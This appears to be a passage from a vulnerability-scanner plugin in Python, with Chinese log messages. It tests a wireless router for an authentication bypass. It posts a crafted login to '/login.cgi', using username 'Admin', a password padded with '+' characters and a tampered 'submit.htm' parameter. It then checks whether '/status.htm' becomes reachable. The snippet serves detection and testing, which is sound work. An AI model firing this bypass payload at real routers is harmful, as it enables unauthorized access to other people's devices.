data = 'username=Admin&password=+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++&submit.htm%3Flogin.htm=Send'
payload = '/login.cgi'
url = self.target + payload
r1 = s.post(url, headers=headers, data=data)
time.sleep(1)
r2 = s.get(self.target + '/status.htm')
if r2.status_code == 200 and 'Wireless Router Status' in r2.text:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
